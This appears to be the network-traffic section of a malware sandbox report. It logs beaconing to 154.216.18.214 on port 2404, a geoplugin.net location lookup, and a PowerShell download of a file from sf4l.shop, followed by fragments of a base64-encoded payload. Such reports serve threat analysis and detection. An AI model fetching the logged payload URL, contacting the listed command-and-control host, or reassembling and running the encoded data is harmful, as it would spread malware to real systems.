Oct 21, 2024 17:06:01.620028973 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620038033 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620050907 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620057106 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620065928 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620084047 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620085001 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620099068 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620112896 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620117903 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620146036 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620150089 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620163918 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620178938 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620197058 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620209932 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620222092 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620232105 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620244980 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620244980 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620259047 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620268106 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620280027 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620290995 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620294094 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620309114 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620321989 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620332003 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620354891 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620404959 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620417118 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620426893 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620440006 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620448112 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620451927 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620472908 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620884895 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620898008 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620909929 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620919943 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620920897 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620934963 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620944977 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620945930 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620958090 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620964050 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620971918 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.620989084 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.620992899 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621007919 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621018887 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621026993 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.621031046 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621045113 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.621047974 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621061087 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621073008 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621083975 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621089935 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.621098042 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621109009 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621109962 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.621121883 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621134043 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621134043 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.621159077 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.621268988 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621279955 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:01.621304989 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.663331985 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.668500900 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:01.834830999 CEST	80	49972	178.237.33.50	192.168.2.7
Oct 21, 2024 17:06:01.834918976 CEST	49972	80	192.168.2.7	178.237.33.50
Oct 21, 2024 17:06:07.954490900 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:07.959908009 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960019112 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960050106 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:07.960067034 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960113049 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:07.960146904 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960158110 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960175037 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960230112 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960311890 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960321903 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.960330963 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.965831041 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.965847015 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.965866089 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.965874910 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.965884924 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.965917110 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:07.965928078 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:08.219729900 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:08.225577116 CEST	2404	49971	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:08.225620985 CEST	49971	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:17.762248993 CEST	2404	49960	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:17.764933109 CEST	49960	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:17.770385981 CEST	2404	49960	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:47.796410084 CEST	2404	49960	154.216.18.214	192.168.2.7
Oct 21, 2024 17:06:47.799300909 CEST	49960	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:06:47.805013895 CEST	2404	49960	154.216.18.214	192.168.2.7
Oct 21, 2024 17:07:17.809309006 CEST	2404	49960	154.216.18.214	192.168.2.7
Oct 21, 2024 17:07:17.811511040 CEST	49960	2404	192.168.2.7	154.216.18.214
Oct 21, 2024 17:07:17.817029953 CEST	2404	49960	154.216.18.214	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 17:05:25.185508966 CEST	51510	53	192.168.2.7	1.1.1.1
Oct 21, 2024 17:05:25.318968058 CEST	53	51510	1.1.1.1	192.168.2.7
Oct 21, 2024 17:06:00.146655083 CEST	61907	53	192.168.2.7	1.1.1.1
Oct 21, 2024 17:06:00.156414986 CEST	53	61907	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 21, 2024 17:05:25.185508966 CEST	192.168.2.7	1.1.1.1	0xadf3	Standard query (0)	sf4l.shop	A (IP address)	IN (0x0001)	false
Oct 21, 2024 17:06:00.146655083 CEST	192.168.2.7	1.1.1.1	0xf965	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 21, 2024 17:05:25.318968058 CEST	1.1.1.1	192.168.2.7	0xadf3	No error (0)	sf4l.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 17:05:25.318968058 CEST	1.1.1.1	192.168.2.7	0xadf3	No error (0)	sf4l.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 17:06:00.156414986 CEST	1.1.1.1	192.168.2.7	0xf965	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

sf4l.shop

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49972	178.237.33.50	80	8140	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 17:06:00.163453102 CEST	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Oct 21, 2024 17:06:00.752000093 CEST	1168	IN	HTTP/1.1 200 OK date: Mon, 21 Oct 2024 15:06:00 GMT server: Apache content-length: 960 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 35 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED] Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49746	188.114.97.3	443	7540	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 15:05:25 UTC	172	OUT	GET /zWAbmrmP/Diwani.pfb HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sf4l.shop Connection: Keep-Alive
2024-10-21 15:05:26 UTC	760	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 15:05:26 GMT Content-Type: application/octet-stream Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sORWeGLIJsRDqF%2BG9FWGeVm7%2Fe%2BpHGpGnarUbge39uIOLZuQqVh0vh5ZwGV2kp5LT%2F15fqRvB4tRdbwPfgjBV8tS4XInhYNS0o3ExpL8%2BMtf8TQ2yyPrCo%2FqsCA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6225507d7f8c1b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=786&delivery_rate=1467815&cwnd=251&unsent_bytes=0&cid=262a1b030cba092d&ts=293&x=0"
2024-10-21 15:05:26 UTC	609	IN	Data Raw: 33 31 65 61 0d 0a 36 77 4c 4d 71 65 73 43 6f 78 43 37 61 57 63 50 41 4f 73 43 50 39 76 72 41 69 56 2b 41 31 77 6b 42 4f 73 43 72 63 35 78 41 5a 75 35 79 55 31 47 6e 75 73 43 7a 73 50 72 41 6b 52 74 67 66 48 73 69 56 49 51 63 51 47 62 36 77 4c 33 2b 6f 48 70 4a 63 51 55 6a 75 73 43 61 6e 5a 78 41 5a 74 78 41 5a 74 78 41 5a 75 36 35 63 54 68 56 4f 73 43 75 4b 2f 72 41 6e 59 6e 36 77 4a 48 68 6e 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4b 36 55 4e 48 69 63 51 47 62 36 77 4c 45 75 49 50 42 42 48 45 42 6d 33 45 42 6d 34 48 35 56 79 75 66 41 48 7a 4e 36 77 4a 78 54 6e 45 42 6d 34 74 45 4a 41 52 78 41 5a 76 72 41 71 6b 4c 69 63 50 72 41 6b 75 33 63 51 47 62 67 63 4f 5a 45 6a 51 41 36 77 49 54 4a 58 45 42 6d 37 72 77 4d 4a 6d 76 36 Data Ascii: 31ea6wLMqesCoxC7aWcPAOsCP9vrAiV+A1wkBOsCrc5xAZu5yU1GnusCzsPrAkRtgfHsiVIQcQGb6wL3+oHpJcQUjusCanZxAZtxAZtxAZu65cThVOsCuK/rAnYn6wJHhnEBmzHKcQGbcQGbiRQLcQGb6wK6UNHicQGb6wLEuIPBBHEBm3EBm4H5VyufAHzN6wJxTnEBm4tEJARxAZvrAqkLicPrAku3cQGbgcOZEjQA6wITJXEBm7rwMJmv6
2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 62 55 33 45 42 6d 2b 73 43 36 45 4e 71 2f 2b 73 43 33 61 48 72 41 6a 54 68 67 38 49 46 63 51 47 62 63 51 47 62 4d 66 5a 78 41 5a 76 72 41 6e 55 48 4d 63 6e 72 41 67 4e 34 36 77 49 77 38 59 73 61 63 51 47 62 36 77 4c 4f 57 6b 48 72 41 6d 79 4a 36 77 4a 7a 4d 54 6b 63 43 6e 58 79 63 51 47 62 63 51 47 62 52 6e 45 42 6d 33 45 42 6d 34 42 38 43 76 75 34 64 64 35 78 41 5a 74 78 41 5a 75 4c 52 41 72 38 36 77 4a 67 6b 6e 45 42 6d 79 6e 77 36 77 4b 32 5a 48 45 42 6d 2f 2f 53 36 77 4c 32 71 65 73 43 51 49 4b 36 51 4c 73 45 41 48 45 42 6d 33 45 42 6d 7a 48 41 36 77 4b 73 2f 4f 73 43 4f 38 47 4c 66 43 51 4d 63 51 47 62 36 77 4a 63 6c 34 45 30 42 2b 6e 64 47 2f 72 72 41 73 4d 38 36 77 4a 53 63 34 50 41 42 4f 73 43 2b 35 5a 78 41 5a 73 35 30 48 58 6a 36 77 49 54 7a 75 Data Ascii: bU3EBm+sC6ENq/+sC3aHrAjThg8IFcQGbcQGbMfZxAZvrAnUHMcnrAgN46wIw8YsacQGb6wLOWkHrAmyJ6wJzMTkcCnXycQGbcQGbRnEBm3EBm4B8Cvu4dd5xAZtxAZuLRAr86wJgknEBmynw6wK2ZHEBm//S6wL2qesCQIK6QLsEAHEBm3EBmzHA6wKs/OsCO8GLfCQMcQGb6wJcl4E0B+ndG/rrAsM86wJSc4PABOsC+5ZxAZs50HXj6wITzu
2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 53 37 61 71 74 38 6f 4a 45 33 67 54 74 79 55 46 66 6a 53 56 77 72 6d 6d 48 50 33 49 74 48 74 6c 78 31 2b 65 7a 63 42 46 41 74 52 55 62 4b 4c 6e 53 74 31 47 77 31 78 53 45 6f 75 68 41 47 57 53 6d 72 2b 7a 6a 36 45 6f 75 7a 30 75 65 77 4e 73 66 76 76 4f 58 4e 6b 6c 2b 76 7a 71 71 33 56 55 2b 76 76 34 51 4a 38 35 6c 74 4a 49 31 74 43 37 47 59 64 63 46 42 54 74 37 69 55 46 4a 38 2b 55 4c 66 65 54 50 6a 77 67 46 39 50 6e 64 5a 64 59 30 4b 4f 50 58 4f 45 70 56 59 65 53 64 78 66 63 47 2f 6f 6c 58 42 70 34 53 65 58 61 44 36 48 75 72 42 6a 66 6f 79 7a 74 53 6d 38 59 63 65 2f 49 4e 35 4c 51 31 4b 4c 36 45 78 39 4d 65 77 41 4c 67 65 6e 4f 58 4f 72 58 2b 49 53 7a 39 65 6e 4e 46 66 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 73 6e Data Ascii: S7aqt8oJE3gTtyUFfjSVwrmmHP3ItHtlx1+ezcBFAtRUbKLnSt1Gw1xSEouhAGWSmr+zj6Eouz0uewNsfvvOXNkl+vzqq3VU+vv4QJ85ltJI1tC7GYdcFBTt7iUFJ8+ULfeTPjwgF9PndZdY0KOPXOEpVYeSdxfcG/olXBp4SeXaD6HurBjfoyztSm8Yce/IN5LQ1KL6Ex9MewALgenOXOrX+ISz9enNFfrp3Rv66d0b+undG/rp3Rv66d0b+sn
2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 64 30 67 57 71 52 75 4d 32 77 4c 5a 47 6b 70 36 78 30 74 47 52 78 63 39 61 45 6b 48 6d 37 31 4c 75 7a 31 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 33 71 6e 65 58 76 6c 69 72 37 79 65 67 71 32 73 59 6d 6a 4e 2b 2b 6e 64 38 35 35 75 32 52 74 7a 62 50 55 61 2b 75 6d 50 6f 57 35 47 41 75 64 37 47 79 43 4a 35 51 35 63 36 54 6a 72 48 51 42 7a 36 37 2f 37 36 71 35 6b 71 73 47 6f 35 65 4a 48 45 76 63 51 75 35 5a 6e 38 6f 78 62 30 68 64 47 30 4b 30 74 6a 7a 4c 61 34 35 41 55 55 53 39 33 64 55 6e 39 6c 6d 4b 48 46 50 76 32 37 78 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 38 69 78 43 4f 47 4d 51 37 72 53 63 61 54 42 46 50 76 79 52 78 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 Data Ascii: d0gWqRuM2wLZGkp6x0tGRxc9aEkHm71Luz1+undG/rp3Rv66d0b+undG/rp3Rv63qneXvlir7yegq2sYmjN++nd855u2RtzbPUa+umPoW5GAud7GyCJ5Q5c6TjrHQBz67/76q5kqsGo5eJHEvcQu5Zn8oxb0hdG0K0tjzLa45AUUS93dUn9lmKHFPv27xv66d0b+undG/rp3Rv66d0b+undG8ixCOGMQ7rScaTBFPvyRxv66d0b+undG/rp3Rv6
2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 76 64 2b 59 4c 57 32 41 32 61 7a 73 30 59 74 66 53 76 74 62 6d 44 6c 47 57 53 66 39 66 66 47 2f 70 52 36 36 77 52 76 2b 67 53 4f 35 4a 50 31 35 38 48 30 48 4f 71 55 77 6c 79 6d 76 4f 33 36 65 4f 56 4c 77 6a 79 5a 63 51 74 59 74 39 6a 7a 38 67 4e 6c 50 77 7a 42 69 43 79 7a 78 37 53 57 34 4f 36 5a 72 5a 52 58 6d 6d 61 4f 61 48 56 64 37 70 6f 4c 70 45 32 55 34 4b 61 45 59 5a 64 77 41 64 6f 48 75 76 37 71 34 35 4d 5a 6d 41 36 45 75 56 30 35 64 47 44 35 49 58 59 66 45 37 41 56 6c 79 61 31 53 47 48 75 71 46 37 4a 38 50 4f 53 69 4b 71 77 48 4c 57 35 4a 77 4b 30 31 47 37 6e 69 47 32 75 2b 77 39 70 6b 46 41 31 31 75 6b 79 30 65 35 56 70 37 45 36 39 30 62 72 56 61 4f 70 39 4f 51 58 4f 78 62 75 38 44 46 65 79 35 4a 42 47 54 6a 58 4e 79 41 47 2f 46 56 71 48 56 55 2b Data Ascii: vd+YLW2A2azs0YtfSvtbmDlGWSf9ffG/pR66wRv+gSO5JP158H0HOqUwlymvO36eOVLwjyZcQtYt9jz8gNlPwzBiCyzx7SW4O6ZrZRXmmaOaHVd7poLpE2U4KaEYZdwAdoHuv7q45MZmA6EuV05dGD5IXYfE7AVlya1SGHuqF7J8POSiKqwHLW5JwK01G7niG2u+w9pkFA11uky0e5Vp7E690brVaOp9OQXOxbu8DFey5JBGTjXNyAG/FVqHVU+
2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 62 2b 75 6e 64 47 2f 64 69 6b 75 49 62 61 42 75 30 54 67 74 74 54 45 56 70 34 6b 4b 70 61 43 6f 65 67 54 64 30 6d 67 32 72 79 5a 77 41 59 4e 6f 74 53 46 63 44 4e 33 79 73 41 65 4b 6f 35 43 77 70 6c 43 30 66 47 42 76 32 6e 38 6e 69 59 75 57 4b 65 4f 51 2f 70 32 43 4f 52 6c 6b 37 7a 41 76 42 50 52 77 73 55 71 55 75 57 47 2f 34 36 64 31 51 2b 2b 4b 42 6d 6c 65 64 33 78 76 36 76 6e 6d 52 37 47 68 77 62 2f 6a 70 33 63 62 78 48 4f 65 61 56 35 33 66 47 2f 72 2f 6a 4a 44 77 35 74 76 38 59 4f 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 65 76 6a 37 4c 68 2f 62 37 63 73 2f 44 61 43 57 4f 61 75 6a 75 76 64 47 34 2f 64 30 74 7a 49 74 39 30 62 2b 75 6e 64 47 2f 72 70 33 52 76 36 36 64 30 62 2b 75 6e 64 47 2f 72 70 33 53 66 7a 71 68 Data Ascii: b+undG/dikuIbaBu0TgttTEVp4kKpaCoegTd0mg2ryZwAYNotSFcDN3ysAeKo5CwplC0fGBv2n8niYuWKeOQ/p2CORlk7zAvBPRwsUqUuWG/46d1Q++KBmled3xv6vnmR7Ghwb/jp3cbxHOeaV53fG/r/jJDw5tv8YOndG/rp3Rv66d0b+undG/rp3Rv66evj7Lh/b7cs/DaCWOaujuvdG4/d0tzIt90b+undG/rp3Rv66d0b+undG/rp3Sfzqh
2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 2b 53 32 76 52 79 65 61 31 73 32 57 6c 33 67 4b 69 71 54 59 77 6d 48 61 65 78 34 39 52 71 7a 31 58 4f 7a 61 78 62 78 4c 65 78 34 62 74 55 56 37 58 4e 77 6d 35 52 62 37 72 48 56 55 2f 66 76 58 51 43 4d 69 6c 38 32 35 4f 6d 72 61 34 6d 75 35 6a 73 49 39 4b 4e 4f 6a 57 43 5a 57 71 5a 6d 33 6e 54 34 56 45 39 49 6b 48 77 4b 64 53 65 4c 61 35 6f 68 4a 59 38 56 4e 54 65 57 68 42 78 35 75 6f 36 58 72 4e 66 46 6d 75 6c 58 59 48 69 75 33 39 4c 75 67 46 4d 6c 4a 34 74 72 6d 69 45 6c 6a 78 55 31 4e 35 61 45 48 48 6d 36 6a 70 65 73 31 38 57 61 36 56 64 67 65 4b 37 66 30 75 36 41 55 79 55 57 71 55 5a 34 74 66 2f 46 65 34 39 48 6d 55 37 68 75 37 64 31 44 70 57 6a 70 50 2f 58 50 34 6b 4f 6f 55 2b 2b 75 7a 32 56 63 36 5a 6d 48 56 62 78 37 47 36 7a 74 42 31 46 63 38 52 70 Data Ascii: +S2vRyea1s2Wl3gKiqTYwmHaex49Rqz1XOzaxbxLex4btUV7XNwm5Rb7rHVU/fvXQCMil825Omra4mu5jsI9KNOjWCZWqZm3nT4VE9IkHwKdSeLa5ohJY8VNTeWhBx5uo6XrNfFmulXYHiu39LugFMlJ4trmiEljxU1N5aEHHm6jpes18Wa6VdgeK7f0u6AUyUWqUZ4tf/Fe49HmU7hu7d1DpWjpP/XP4kOoU++uz2Vc6ZmHVbx7G6ztB1Fc8Rp
2024-10-21 15:05:26 UTC	1369	IN	Data Raw: 32 67 75 71 53 34 47 65 45 70 44 6a 2b 34 57 73 6d 67 73 59 75 2b 46 42 4a 6f 37 6a 30 69 45 6c 47 44 45 39 49 64 36 64 63 4d 72 6f 55 58 38 45 35 53 47 79 4b 37 6e 53 68 35 49 45 39 44 55 31 52 76 51 6e 75 73 7a 61 6b 4a 37 47 6e 58 4a 43 6e 53 50 6f 66 6c 4b 33 37 4a 37 4b 2b 51 39 42 68 64 63 38 55 4f 4b 67 61 52 37 47 31 54 54 33 55 46 63 36 52 61 61 57 46 74 7a 30 34 44 70 6e 32 41 4a 4c 4c 38 52 33 45 74 57 57 6e 6c 71 4d 6f 32 57 4a 70 64 79 70 30 66 31 31 51 47 39 6d 75 76 4b 79 34 4b 75 2b 39 43 48 48 62 2b 63 2b 68 4a 79 32 31 56 63 56 45 47 70 4a 52 74 59 76 59 73 4e 38 49 4d 78 57 5a 33 4a 32 58 58 41 4f 4f 64 74 74 41 45 55 71 4a 5a 51 75 4f 43 4c 6d 72 78 2b 6f 53 38 2f 4f 50 38 41 6f 6f 4f 5a 61 74 6e 6c 74 4f 36 6f 34 5a 42 6e 70 39 38 62 Data Ascii: 2guqS4GeEpDj+4WsmgsYu+FBJo7j0iElGDE9Id6dcMroUX8E5SGyK7nSh5IE9DU1RvQnuszakJ7GnXJCnSPoflK37J7K+Q9Bhdc8UOKgaR7G1TT3UFc6RaaWFtz04Dpn2AJLL8R3EtWWnlqMo2WJpdyp0f11QG9muvKy4Ku+9CHHb+c+hJy21VcVEGpJRtYvYsN8IMxWZ3J2XXAOOdttAEUqJZQuOCLmrx+oS8/OP8AooOZatnltO6o4ZBnp98b
